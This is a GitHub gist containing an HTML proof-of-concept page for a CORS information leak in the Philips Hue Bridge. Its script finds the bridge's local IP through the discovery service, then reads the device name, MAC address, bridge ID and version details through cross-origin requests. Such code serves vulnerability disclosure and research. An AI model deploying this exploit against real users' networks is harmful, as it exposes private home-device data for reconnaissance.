Created
March 9, 2021 10:37
-
-
Save vavkamil/9b77125eb4b6c7ff971aa9fa6b62e7ba to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <head> | |
| <title>Hue Bridge CORS PoC</title> | |
| <script> | |
| var xhr = new XMLHttpRequest(); | |
| xhr.open("GET", "https://discovery.meethue.com/") | |
| xhr.send(); | |
| xhr.onreadystatechange = function(e) { | |
| var hue_ip; | |
| if (xhr.readyState === 4) { | |
| var response = xhr.responseText; | |
| console.log(response); | |
| var obj = JSON.parse(response); | |
| hue_ip = obj[0].internalipaddress; | |
| document.getElementById("hue_ip").textContent = hue_ip; | |
| xhr.open("GET", "https://" + hue_ip + "/api/config"); | |
| xhr.send(); | |
| xhr.onreadystatechange = function(e) { | |
| if (xhr.readyState === 4) { | |
| var response = xhr.responseText; | |
| console.log(response) | |
| var obj = JSON.parse(response); | |
| var name = obj.name; | |
| document.getElementById("name").textContent = name; | |
| var datastoreversion = obj.datastoreversion; | |
| document.getElementById("datastoreversion").textContent = datastoreversion; | |
| var swversion = obj.swversion; | |
| document.getElementById("swversion").textContent = swversion; | |
| var apiversion = obj.apiversion; | |
| document.getElementById("apiversion").textContent = apiversion; | |
| var mac = obj.mac; | |
| document.getElementById("mac").textContent = mac; | |
| var bridgeid = obj.bridgeid; | |
| document.getElementById("bridgeid").textContent = bridgeid; | |
| var factorynew = obj.factorynew; | |
| document.getElementById("factorynew").textContent = factorynew; | |
| var replacesbridgeid = obj.replacesbridgeid; | |
| document.getElementById("replacesbridgeid").textContent = replacesbridgeid; | |
| var modelid = obj.modelid; | |
| document.getElementById("modelid").textContent = modelid; | |
| var starterkitid = obj.starterkitid; | |
| document.getElementById("starterkitid").textContent = starterkitid; | |
| } | |
| } | |
| } | |
| } | |
| </script> | |
| </head> | |
| <body> | |
| <h1>Proof of Concept</h1> | |
| <h2>Hue Bridge CORS info leak</h2> | |
| <strong>Note: first accept SSL cert from your Hue Bridge (https://IP)</strong> | |
| <br><br> | |
| <label for="hue_ip">IP:</label> | |
| <span id="hue_ip"></span> | |
| <br><br> | |
| <label for="name">name:</label> | |
| <span id="name"></span> | |
| <br><br> | |
| <label for="datastoreversion">datastoreversion:</label> | |
| <span id="datastoreversion"></span> | |
| <br><br> | |
| <label for="swversion">swversion:</label> | |
| <span id="swversion"></span> | |
| <br><br> | |
| <label for="apiversion">apiversion:</label> | |
| <span id="apiversion"></span> | |
| <br><br> | |
| <label for="mac">mac:</label> | |
| <span id="mac"></span> | |
| <br><br> | |
| <label for="bridgeid">bridgeid:</label> | |
| <span id="bridgeid"></span> | |
| <br><br> | |
| <label for="factorynew">factorynew:</label> | |
| <span id="factorynew"></span> | |
| <br><br> | |
| <label for="replacesbridgeid">replacesbridgeid:</label> | |
| <span id="replacesbridgeid"></span> | |
| <br><br> | |
| <label for="modelid">modelid:</label> | |
| <span id="modelid"></span> | |
| <br><br> | |
| <label for="starterkitid">starterkitid:</label> | |
| <span id="starterkitid"></span> | |
| </body> | |
| </html> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment